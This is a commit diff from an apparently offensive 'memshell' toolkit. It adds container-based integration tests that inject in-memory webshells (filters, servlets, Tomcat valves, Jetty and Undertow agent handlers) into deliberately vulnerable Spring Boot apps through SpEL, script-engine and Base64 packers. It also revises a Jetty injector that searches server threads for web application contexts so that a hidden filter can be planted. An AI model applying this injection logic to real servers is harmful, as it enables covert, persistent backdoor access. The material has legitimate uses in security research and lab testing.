fix: SpringBoot Undertow and Jetty Shell inject failed

Author: ReaJason

integration-test/build.gradle

@@ -51,12 +51,15 @@ idea {
 }
 
 test {
-    dependsOn(":vul:vul-webapp:war",
+    dependsOn(
+            ":vul:vul-webapp:war",
             ":vul:vul-webapp-expression:war",
             ":vul:vul-webapp-deserialize:war",
             ":vul:vul-webapp-jakarta:war",
             ":vul:vul-springboot1:bootJar",
             ":vul:vul-springboot2:bootJar",
+            ":vul:vul-springboot2-jetty:bootJar",
+            ":vul:vul-springboot2-undertow:bootJar",
             ":vul:vul-springboot2:bootWar",
             ":vul:vul-springboot2-webflux:bootJar",
             ":vul:vul-springboot3:bootJar",

integration-test/src/test/java/com/reajason/javaweb/integration/ContainerTool.java

@@ -20,6 +20,8 @@ public class ContainerTool {
     public static final Path neoGeorgDockerfile = Path.of("..", "asserts", "neoreg", "Dockerfile").toAbsolutePath();
     public static final Path springBoot1Dockerfile = Path.of("..", "vul", "vul-springboot1", "Dockerfile").toAbsolutePath();
     public static final Path springBoot2Dockerfile = Path.of("..", "vul", "vul-springboot2", "Dockerfile").toAbsolutePath();
+    public static final Path springBoot2JettyDockerfile = Path.of("..", "vul", "vul-springboot2-jetty", "Dockerfile").toAbsolutePath();
+    public static final Path springBoot2UndertowDockerfile = Path.of("..", "vul", "vul-springboot2-undertow", "Dockerfile").toAbsolutePath();
     public static final Path springBoot2WebfluxDockerfile = Path.of("..", "vul", "vul-springboot2-webflux", "Dockerfile").toAbsolutePath();
     public static final Path springBoot3Dockerfile = Path.of("..", "vul", "vul-springboot3", "Dockerfile").toAbsolutePath();
     public static final Path springBoot3WebfluxDockerfile = Path.of("..", "vul", "vul-springboot3-webflux", "Dockerfile").toAbsolutePath();

integration-test/src/test/java/com/reajason/javaweb/integration/ShellAssertionTool.java

@@ -306,7 +306,7 @@ public static void assertInjectIsOk(String url, String shellType, ShellTool shel
             }
             case ScriptEngine -> VulTool.postData(url + "/js", content);
             case EL -> VulTool.postData(url + "/el", content);
-            case SpEL -> VulTool.postData(url + "/spel", content);
+            case SpEL, SpELSpringIOUtils -> VulTool.postData(url + "/spel", content);
             case OGNL -> VulTool.postData(url + "/ognl", content);
             case MVEL -> VulTool.postData(url + "/mvel", content);
             case JXPath -> VulTool.postData(url + "/jxpath", content);

integration-test/src/test/java/com/reajason/javaweb/integration/springmvc/SpringBoot2JettyContainerTest.java

@@ -0,0 +1,105 @@
+package com.reajason.javaweb.integration.springmvc;
+
+import com.reajason.javaweb.integration.TestCasesProvider;
+import com.reajason.javaweb.memshell.Packers;
+import com.reajason.javaweb.memshell.Server;
+import com.reajason.javaweb.memshell.ShellTool;
+import com.reajason.javaweb.memshell.ShellType;
+import lombok.extern.slf4j.Slf4j;
+import net.bytebuddy.jar.asm.Opcodes;
+import org.junit.jupiter.api.AfterAll;
+import org.junit.jupiter.params.ParameterizedTest;
+import org.junit.jupiter.params.provider.Arguments;
+import org.junit.jupiter.params.provider.MethodSource;
+import org.testcontainers.containers.GenericContainer;
+import org.testcontainers.containers.Network;
+import org.testcontainers.containers.wait.strategy.Wait;
+import org.testcontainers.images.builder.ImageFromDockerfile;
+import org.testcontainers.junit.jupiter.Container;
+import org.testcontainers.junit.jupiter.Testcontainers;
+
+import java.util.List;
+import java.util.stream.Stream;
+
+import static com.reajason.javaweb.integration.ContainerTool.*;
+import static com.reajason.javaweb.integration.DoesNotContainExceptionMatcher.doesNotContainException;
+import static com.reajason.javaweb.integration.ShellAssertionTool.testShellInjectAssertOk;
+import static org.hamcrest.MatcherAssert.assertThat;
+
+/**
+ * @author ReaJason
+ * @since 2024/12/22
+ */
+@Testcontainers
+@Slf4j
+public class SpringBoot2JettyContainerTest {
+    public static final String imageName = "springboot2-jetty";
+
+    static Network network = Network.newNetwork();
+    @Container
+    public final static GenericContainer<?> python = new GenericContainer<>(new ImageFromDockerfile()
+            .withDockerfile(neoGeorgDockerfile))
+            .withNetwork(network);
+
+    @Container
+    public final static GenericContainer<?> container = new GenericContainer<>(new ImageFromDockerfile()
+            .withDockerfile(springBoot2JettyDockerfile))
+            .withCopyToContainer(jattachFile, "/jattach")
+            .withCopyToContainer(springbootPid, "/fetch_pid.sh")
+            .withNetwork(network)
+            .withNetworkAliases("app")
+            .waitingFor(Wait.forHttp("/test"))
+            .withExposedPorts(8080);
+
+    static Stream<Arguments> casesProvider() {
+        Server server = Server.SpringWebMvc;
+        List<String> supportedShellTypes = List.of(
+                ShellType.SPRING_WEBMVC_INTERCEPTOR,
+                ShellType.SPRING_WEBMVC_CONTROLLER_HANDLER,
+                ShellType.SPRING_WEBMVC_AGENT_FRAMEWORK_SERVLET,
+                ShellType.SPRING_WEBMVC_AGENT_FRAMEWORK_SERVLET_ASM
+        );
+        List<Packers> testPackers = List.of(Packers.ScriptEngine, Packers.SpEL, Packers.Base64);
+        return TestCasesProvider.getTestCases(imageName, server, supportedShellTypes, testPackers);
+    }
+
+    @AfterAll
+    static void tearDown() {
+        String logs = container.getLogs();
+        log.info(logs);
+        assertThat("Logs should not contain any exceptions", logs, doesNotContainException());
+    }
+
+    @ParameterizedTest(name = "{0}|{1}{2}|{3}")
+    @MethodSource("casesProvider")
+    void test(String imageName, String shellType, ShellTool shellTool, Packers packer) {
+        testShellInjectAssertOk(getUrl(container), Server.SpringWebMvc, shellType, shellTool, Opcodes.V1_8, packer, container, python);
+    }
+
+    public static String getUrl(GenericContainer<?> container) {
+        String host = container.getHost();
+        int port = container.getMappedPort(8080);
+        String url = "http://" + host + ":" + port;
+        log.info("container started, app url is : {}", url);
+        return url;
+    }
+
+    static Stream<Arguments> jettyCasesProvider() {
+        Server server = Server.Jetty;
+        List<String> supportedShellTypes = List.of(
+                ShellType.SERVLET,
+                ShellType.FILTER,
+//                ShellType.LISTENER,
+                ShellType.JETTY_AGENT_HANDLER,
+                ShellType.JETTY_AGENT_HANDLER_ASM
+        );
+        List<Packers> testPackers = List.of(Packers.ScriptEngine, Packers.SpEL, Packers.Base64);
+        return TestCasesProvider.getTestCases(imageName, server, supportedShellTypes, testPackers);
+    }
+
+    @ParameterizedTest(name = "{0}|{1}{2}|{3}")
+    @MethodSource("jettyCasesProvider")
+    void testJetty(String imageName, String shellType, ShellTool shellTool, Packers packer) {
+        testShellInjectAssertOk(getUrl(container), Server.Jetty, shellType, shellTool, Opcodes.V1_8, packer, container, python);
+    }
+}

integration-test/src/test/java/com/reajason/javaweb/integration/springmvc/SpringBoot2UndertowContainerTest.java

@@ -0,0 +1,105 @@
+package com.reajason.javaweb.integration.springmvc;
+
+import com.reajason.javaweb.integration.TestCasesProvider;
+import com.reajason.javaweb.memshell.Packers;
+import com.reajason.javaweb.memshell.Server;
+import com.reajason.javaweb.memshell.ShellTool;
+import com.reajason.javaweb.memshell.ShellType;
+import lombok.extern.slf4j.Slf4j;
+import net.bytebuddy.jar.asm.Opcodes;
+import org.junit.jupiter.api.AfterAll;
+import org.junit.jupiter.params.ParameterizedTest;
+import org.junit.jupiter.params.provider.Arguments;
+import org.junit.jupiter.params.provider.MethodSource;
+import org.testcontainers.containers.GenericContainer;
+import org.testcontainers.containers.Network;
+import org.testcontainers.containers.wait.strategy.Wait;
+import org.testcontainers.images.builder.ImageFromDockerfile;
+import org.testcontainers.junit.jupiter.Container;
+import org.testcontainers.junit.jupiter.Testcontainers;
+
+import java.util.List;
+import java.util.stream.Stream;
+
+import static com.reajason.javaweb.integration.ContainerTool.*;
+import static com.reajason.javaweb.integration.DoesNotContainExceptionMatcher.doesNotContainException;
+import static com.reajason.javaweb.integration.ShellAssertionTool.testShellInjectAssertOk;
+import static org.hamcrest.MatcherAssert.assertThat;
+
+/**
+ * @author ReaJason
+ * @since 2024/12/22
+ */
+@Testcontainers
+@Slf4j
+public class SpringBoot2UndertowContainerTest {
+    public static final String imageName = "springboot2-undertow";
+
+    static Network network = Network.newNetwork();
+    @Container
+    public final static GenericContainer<?> python = new GenericContainer<>(new ImageFromDockerfile()
+            .withDockerfile(neoGeorgDockerfile))
+            .withNetwork(network);
+
+    @Container
+    public final static GenericContainer<?> container = new GenericContainer<>(new ImageFromDockerfile()
+            .withDockerfile(springBoot2UndertowDockerfile))
+            .withCopyToContainer(jattachFile, "/jattach")
+            .withCopyToContainer(springbootPid, "/fetch_pid.sh")
+            .withNetwork(network)
+            .withNetworkAliases("app")
+            .waitingFor(Wait.forHttp("/test"))
+            .withExposedPorts(8080);
+
+    static Stream<Arguments> casesProvider() {
+        Server server = Server.SpringWebMvc;
+        List<String> supportedShellTypes = List.of(
+                ShellType.SPRING_WEBMVC_INTERCEPTOR,
+                ShellType.SPRING_WEBMVC_CONTROLLER_HANDLER,
+                ShellType.SPRING_WEBMVC_AGENT_FRAMEWORK_SERVLET,
+                ShellType.SPRING_WEBMVC_AGENT_FRAMEWORK_SERVLET_ASM
+        );
+        List<Packers> testPackers = List.of(Packers.ScriptEngine, Packers.SpEL, Packers.Base64);
+        return TestCasesProvider.getTestCases(imageName, server, supportedShellTypes, testPackers);
+    }
+
+    @AfterAll
+    static void tearDown() {
+        String logs = container.getLogs();
+        log.info(logs);
+        assertThat("Logs should not contain any exceptions", logs, doesNotContainException());
+    }
+
+    @ParameterizedTest(name = "{0}|{1}{2}|{3}")
+    @MethodSource("casesProvider")
+    void test(String imageName, String shellType, ShellTool shellTool, Packers packer) {
+        testShellInjectAssertOk(getUrl(container), Server.SpringWebMvc, shellType, shellTool, Opcodes.V1_8, packer, container, python);
+    }
+
+    public static String getUrl(GenericContainer<?> container) {
+        String host = container.getHost();
+        int port = container.getMappedPort(8080);
+        String url = "http://" + host + ":" + port;
+        log.info("container started, app url is : {}", url);
+        return url;
+    }
+
+    static Stream<Arguments> jettyCasesProvider() {
+        Server server = Server.Undertow;
+        List<String> supportedShellTypes = List.of(
+                ShellType.SERVLET,
+                ShellType.FILTER,
+//                ShellType.LISTENER,
+                ShellType.UNDERTOW_AGENT_SERVLET_HANDLER,
+                ShellType.UNDERTOW_AGENT_SERVLET_HANDLER_ASM
+        );
+        List<Packers> testPackers = List.of(Packers.ScriptEngine, Packers.SpEL);
+        return TestCasesProvider.getTestCases(imageName, server, supportedShellTypes, testPackers);
+    }
+
+    @ParameterizedTest(name = "{0}|{1}{2}|{3}")
+    @MethodSource("jettyCasesProvider")
+    void testJetty(String imageName, String shellType, ShellTool shellTool, Packers packer) {
+        testShellInjectAssertOk(getUrl(container), Server.Undertow, shellType, shellTool, Opcodes.V1_8, packer, container, python);
+    }
+}

integration-test/src/test/java/com/reajason/javaweb/integration/springmvc/SpringBoot2WarContainerTest.java

@@ -44,6 +44,8 @@ public class SpringBoot2WarContainerTest {
             .withCopyToContainer(springBoot2WarFile, "/usr/local/tomcat/webapps/app.war")
             .withNetwork(network)
             .withNetworkAliases("app")
+            .withCopyToContainer(jattachFile, "/jattach")
+            .withCopyToContainer(tomcatPid, "/fetch_pid.sh")
             .waitingFor(Wait.forHttp("/app"))
             .withExposedPorts(8080);
 
@@ -52,6 +54,8 @@ static Stream<Arguments> casesProvider() {
         List<String> supportedShellTypes = List.of(
                 ShellType.SPRING_WEBMVC_INTERCEPTOR,
                 ShellType.SPRING_WEBMVC_CONTROLLER_HANDLER
+//                ShellType.SPRING_WEBMVC_AGENT_FRAMEWORK_SERVLET, // TODO: 这个地方会报奇怪的错误，需要排查
+//                ShellType.SPRING_WEBMVC_AGENT_FRAMEWORK_SERVLET_ASM
         );
         List<Packers> testPackers = List.of(Packers.ScriptEngine, Packers.SpEL, Packers.Base64);
         return TestCasesProvider.getTestCases(imageName, server, supportedShellTypes, testPackers);
@@ -68,4 +72,25 @@ static void tearDown() {
     void test(String imageName, String shellType, ShellTool shellTool, Packers packer) {
         testShellInjectAssertOk(getUrl(container), Server.SpringWebMvc, shellType, shellTool, Opcodes.V1_8, packer, container, python);
     }
+
+    static Stream<Arguments> tomcatCasesProvider() {
+        Server server = Server.Tomcat;
+        List<String> supportedShellTypes = List.of(
+                ShellType.FILTER,
+//                ShellType.LISTENER,
+                ShellType.VALVE,
+                ShellType.WEBSOCKET,
+                ShellType.AGENT_FILTER_CHAIN,
+                ShellType.AGENT_FILTER_CHAIN_ASM,
+                ShellType.CATALINA_AGENT_CONTEXT_VALVE,
+                ShellType.CATALINA_AGENT_CONTEXT_VALVE_ASM);
+        List<Packers> testPackers = List.of(Packers.ScriptEngine, Packers.SpEL, Packers.Base64);
+        return TestCasesProvider.getTestCases(imageName, server, supportedShellTypes, testPackers);
+    }
+
+    @ParameterizedTest(name = "{0}|{1}{2}|{3}")
+    @MethodSource("tomcatCasesProvider")
+    void testTomcat(String imageName, String shellType, ShellTool shellTool, Packers packer) {
+        testShellInjectAssertOk(getUrl(container), Server.Tomcat, shellType, shellTool, Opcodes.V1_8, packer, container, python);
+    }
 }

integration-test/src/test/java/com/reajason/javaweb/integration/springmvc/SpringBoot3ContainerTest.java

@@ -80,4 +80,26 @@ public static String getUrl(GenericContainer<?> container) {
         log.info("container started, app url is : {}", url);
         return url;
     }
+
+    static Stream<Arguments> tomcatCasesProvider() {
+        Server server = Server.Tomcat;
+        List<String> supportedShellTypes = List.of(
+                ShellType.JAKARTA_FILTER,
+                ShellType.JAKARTA_LISTENER,
+                ShellType.JAKARTA_VALVE,
+                ShellType.JAKARTA_WEBSOCKET,
+                ShellType.AGENT_FILTER_CHAIN,
+                ShellType.AGENT_FILTER_CHAIN_ASM,
+                ShellType.CATALINA_AGENT_CONTEXT_VALVE,
+                ShellType.CATALINA_AGENT_CONTEXT_VALVE_ASM
+        );
+        List<Packers> testPackers = List.of(Packers.Base64);
+        return TestCasesProvider.getTestCases(imageName, server, supportedShellTypes, testPackers);
+    }
+
+    @ParameterizedTest(name = "{0}|{1}{2}|{3}")
+    @MethodSource("tomcatCasesProvider")
+    void testTomcat(String imageName, String shellType, ShellTool shellTool, Packers packer) {
+        testShellInjectAssertOk(getUrl(container), Server.Tomcat, shellType, shellTool, Opcodes.V1_8, packer, container, python);
+    }
 }

memshell/src/main/java/com/reajason/javaweb/memshell/injector/jetty/JettyFilterInjector.java

@@ -106,29 +106,26 @@ private void moveFilterToFirst(Object servletHandler) throws Exception {
         }
     }
 
-    private List<Object> getContext() {
+    private List<Object> getContext() throws Exception {
         List<Object> contexts = new ArrayList<Object>();
-        Thread[] threads = Thread.getAllStackTraces().keySet().toArray(new Thread[0]);
+        Thread[] threads = (Thread[]) invokeMethod(Thread.class, "getThreads", new Class[0], new Object[0]);
         for (Thread thread : threads) {
             try {
+                // jetty 6
                 Object contextClassLoader = invokeMethod(thread, "getContextClassLoader");
                 if (contextClassLoader.getClass().getName().contains("WebAppClassLoader")) {
-                    Object context = getFieldValue(contextClassLoader, "_context");
-                    Object handler = getFieldValue(context, "_servletHandler");
-                    contexts.add(getFieldValue(handler, "_contextHandler"));
+                    contexts.add(getFieldValue(contextClassLoader, "_context"));
                 } else {
-                    Object threadLocals = getFieldValue(thread, "threadLocals");
-                    Object table = getFieldValue(threadLocals, "table");
-                    for (int i = 0; i < Array.getLength(table); ++i) {
+                    // jetty 7+
+                    Object table = getFieldValue(getFieldValue(thread, "threadLocals"), "table");
+                    for (int i = 0; i < Array.getLength(table); i++) {
                         Object entry = Array.get(table, i);
                         if (entry != null) {
-                            Object httpConnection = getFieldValue(entry, "value");
-                            if (httpConnection != null && httpConnection.getClass().getName().contains("HttpConnection")) {
-                                Object httpChannel = invokeMethod(httpConnection, "getHttpChannel");
-                                Object request = invokeMethod(httpChannel, "getRequest");
-                                Object session = invokeMethod(request, "getSession");
-                                Object servletContext = invokeMethod(session, "getServletContext");
-                                contexts.add(getFieldValue(servletContext, "this$0"));
+                            Object threadLocalValue = getFieldValue(entry, "value");
+                            if (threadLocalValue != null) {
+                                if (threadLocalValue.getClass().getName().contains("WebAppContext")) {
+                                    contexts.add(getFieldValue(threadLocalValue, "this$0"));
+                                }
                             }
                         }
                     }